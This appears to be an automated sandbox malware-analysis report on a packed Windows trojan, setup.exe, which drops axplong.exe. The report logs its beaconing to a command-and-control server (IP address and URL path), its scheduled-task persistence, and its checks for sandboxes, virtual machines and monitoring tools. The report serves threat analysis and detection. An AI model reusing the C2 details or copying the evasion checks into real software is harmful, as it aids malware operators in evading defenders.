Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 162Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 42 41 32 34 33 43 39 46 44 46 44 33 33 43 32 30 41 41 31 42 39 30 37 30 43 34 43 37 31 32 46 44 41 42 39 31 42 36 35 39 30 39 30 46 46 31 45 36 45 38 33 35 33 35 42 30 39 36 44 36 38 46 41 30 35 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C8FBA243C9FDFD33C20AA1B9070C4C712FDAB91B659090FF1E6E83535B096D68FA05
Source: global traffic HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 185.215.113.16 185.215.113.16
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: unknown TCP traffic detected without corresponding DNS query: 185.215.113.16
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00A7BD60 InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile, 13_2_00A7BD60
Source: unknown HTTP traffic detected: POST /Jo89Ku7d/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.16Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php%
Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php&i
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php1
Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpHja
Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpIif
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpU
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpY
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpa
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpded
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpdedS
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpi
Source: axplong.exe, 0000000D.00000002.2499234685.0000000000578000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpmkB
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 0000000D.00000002.2499234685.000000000055F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncodedt

System Summary
barindex
PE file contains section with special chars
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Abnormal high CPU Usage
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process Stats: CPU usage > 49%
Creates files inside the system directory
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00A74CF0 13_2_00A74CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00AB3068 13_2_00AB3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00A7E440 13_2_00A7E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00AA7D83 13_2_00AA7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00A74AF0 13_2_00A74AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00AB765B 13_2_00AB765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00AB2BD0 13_2_00AB2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00AB8720 13_2_00AB8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00AB6F09 13_2_00AB6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00AB777B 13_2_00AB777B
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe EE170A14D676B69CAB768F8A94E482EE9AD6DC1766038D6E26C24FE2CFBD7677
Uses 32bit PE files
Source: setup.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: setup.exe Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: setup.exe Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: axplong.exe.0.dr Static PE information: Section: ZLIB complexity 0.9973284230245232
Source: axplong.exe.0.dr Static PE information: Section: etmksbbt ZLIB complexity 0.9945282549395459
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@4/3@0/1
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user~1\AppData\Local\Temp\44111dbc49 Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: setup.exe ReversingLabs: Detection: 55%
Source: setup.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\setup.exe File read: C:\Users\user\Desktop\setup.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\setup.exe "C:\Users\user\Desktop\setup.exe"
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user~1\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: acgenral.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: msacm32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winmmbase.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: setup.exe Static file information: File size 1939456 > 1048576
Source: setup.exe Static PE information: Raw size of etmksbbt is bigger than: 0x100000 < 0x1a7e00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\setup.exe Unpacked PE file: 0.2.setup.exe.c50000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 4.2.axplong.exe.a70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 13.2.axplong.exe.a70000.0.unpack :EW;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;etmksbbt:EW;iosnleeh:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: axplong.exe.0.dr Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
Source: setup.exe Static PE information: real checksum: 0x1e7836 should be: 0x1e246a
PE file contains sections with non-standard names
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: .idata
Source: setup.exe Static PE information: section name:
Source: setup.exe Static PE information: section name: etmksbbt
Source: setup.exe Static PE information: section name: iosnleeh
Source: setup.exe Static PE information: section name: .taggant
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: .idata
Source: axplong.exe.0.dr Static PE information: section name:
Source: axplong.exe.0.dr Static PE information: section name: etmksbbt
Source: axplong.exe.0.dr Static PE information: section name: iosnleeh
Source: axplong.exe.0.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 13_2_00A8D84C push ecx; ret 13_2_00A8D85F
Source: setup.exe Static PE information: section name: entropy: 7.979174049479235
Source: setup.exe Static PE information: section name: etmksbbt entropy: 7.953652307689506
Source: axplong.exe.0.dr Static PE information: section name: entropy: 7.979174049479235
Source: axplong.exe.0.dr Static PE information: section name: etmksbbt entropy: 7.953652307689506
Drops PE files
Source: C:\Users\user\Desktop\setup.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\setup.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\setup.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\setup.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: CBEC99 second address: CBEC9E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
